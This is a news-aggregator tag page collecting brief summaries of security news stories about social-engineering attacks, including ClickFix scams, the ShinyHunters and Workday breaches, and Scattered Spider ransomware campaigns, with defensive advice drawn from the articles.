All articles tagged with #social engineering
Originally Published 14 days ago — by BleepingComputer
ErrTraffic is a new cybercrime platform that automates ClickFix attacks by creating fake browser glitches on compromised websites to trick users into downloading malware or executing malicious commands, with high success rates and customizable payloads targeting multiple operating systems, primarily sold on hacker forums for $800.
Originally Published 2 months ago — by Ars Technica
ClickFix is a sophisticated scam campaign targeting Windows and macOS users by exploiting trust in online travel bookings and using social engineering tactics, such as fake CAPTCHA prompts and device-adaptive payloads, to infect devices with malware like PureRAT. The attacks leverage native OS capabilities and often bypass security tools, making awareness and cautious behavior the best defenses, especially during holiday gatherings when family members may be less vigilant.
Originally Published 2 months ago — by The Hacker News
Cybersecurity researchers revealed four security vulnerabilities in Microsoft Teams that could allow attackers to impersonate colleagues, manipulate messages without detection, and exploit notifications, posing significant social engineering risks. Some issues have been patched, but the flaws highlight the importance of securing collaboration tools against trust-based attacks, especially as threat actors increasingly target enterprise communication platforms.
Originally Published 2 months ago — by carrollcountyobserver.com
Researchers at ESET have identified 12 malicious Android apps, including some on Google Play, that secretly record conversations and steal personal data using spyware called VajraSpy, which exploits social engineering and emotional trust to infect devices. Users are advised to delete these apps immediately, watch for signs of infection, and follow security best practices to protect their privacy.
Originally Published 4 months ago — by The Conversation
ShinyHunters, a cybercrime group known for data breaches and now employing voice-based social engineering tactics like vishing, has targeted major companies including Salesforce, affecting millions of users. The group has links with other hacking groups and is involved in selling stolen data and offering ransomware services. Protecting against such attacks involves vigilance, employee training, and enhanced security measures like multi-factor authentication. The rise of AI-generated deepfakes makes these scams more sophisticated and harder to detect.
Originally Published 4 months ago — by Gizmodo
Workday, a provider of HR technology, experienced a data breach affecting some user contact information, likely linked to a larger attack on Salesforce databases by the hacking group ShinyHunters, raising concerns about social engineering scams and limited disclosure practices.
Originally Published 4 months ago — by Engadget
Workday experienced a data breach through a social engineering attack targeting its employees, which compromised some business contact information from its third-party CRM platform, though no customer account data was reportedly accessed. The company responded quickly by cutting off access and enhancing security measures, but the full scope of the breach remains uncertain.
Originally Published 4 months ago — by BleepingComputer
Workday disclosed a data breach resulting from a social engineering attack on a third-party CRM platform, likely linked to the ShinyHunters group targeting Salesforce instances, exposing business contact information of over 11,000 organizations, including some of the Fortune 500, while denying customer tenant impact.
Originally Published 5 months ago — by CyberSecurityNews
Russian-linked cybercriminal group EncryptHub is exploiting a zero-day vulnerability in Microsoft Management Console via social engineering on Microsoft Teams to gain remote access, deploy malware, and steal sensitive data, highlighting the need for immediate patching and enhanced security measures.
Originally Published 5 months ago — by Axios
Google announced that the hacking group ShinyHunters breached one of its Salesforce databases containing contact information for small and medium-sized businesses, but the hackers only accessed publicly available data for a brief period. The group is known for social engineering attacks and has targeted other major companies this year, often demanding ransom after data exfiltration.
Originally Published 5 months ago — by Forbes
The FBI has issued a warning against resetting passwords in response to the Scattered Spider cyber threat, which uses social engineering to manipulate support staff into resetting passwords and transferring MFA tokens. Organizations are advised to use phishing-resistant multifactor authentication and review helpdesk procedures to prevent these targeted attacks. Additionally, the FBI warns against scanning QR codes in unsolicited packages, which can lead to financial fraud and data theft.
Originally Published 5 months ago — by Forbes
The FBI and CISA have issued a warning against resetting passwords in response to attacks by the threat group Scattered Spider, which uses sophisticated social engineering tactics to manipulate helpdesk staff into resetting passwords and transferring MFA tokens. Organizations are advised to use phishing-resistant multi-factor authentication and review helpdesk procedures to prevent these targeted attacks.
Originally Published 5 months ago — by theregister.com
The FBI and international agencies warn that the cybercriminal group Scattered Spider has adapted its tactics, now using sophisticated social engineering, legitimate remote access software, and new malware like DragonForce to infiltrate organizations, exfiltrate data, and deploy ransomware rapidly. They target sectors like retail, insurance, and aviation, often exfiltrating data to multiple sites and quickly deploying ransomware such as DragonForce, especially targeting VMware ESXi servers. Despite recent arrests slowing their activity, authorities advise organizations to strengthen defenses through offline backups, multi-factor authentication, and application controls.
Originally Published 5 months ago — by The Hacker News
The cybercrime group Scattered Spider is targeting VMware ESXi hypervisors in North America using social engineering and sophisticated tactics to deploy ransomware, potentially causing severe infrastructure disruptions. Organizations are advised to enhance security measures, including system hardening and monitoring, especially as VMware vSphere approaches end-of-life.
Originally Published 5 months ago — by BleepingComputer
Scattered Spider hackers are targeting VMware ESXi hypervisors through social engineering tactics, gaining extensive control over virtualized environments, and deploying ransomware, with attacks progressing through multiple phases from initial access to data exfiltration, highlighting the need for enhanced security measures.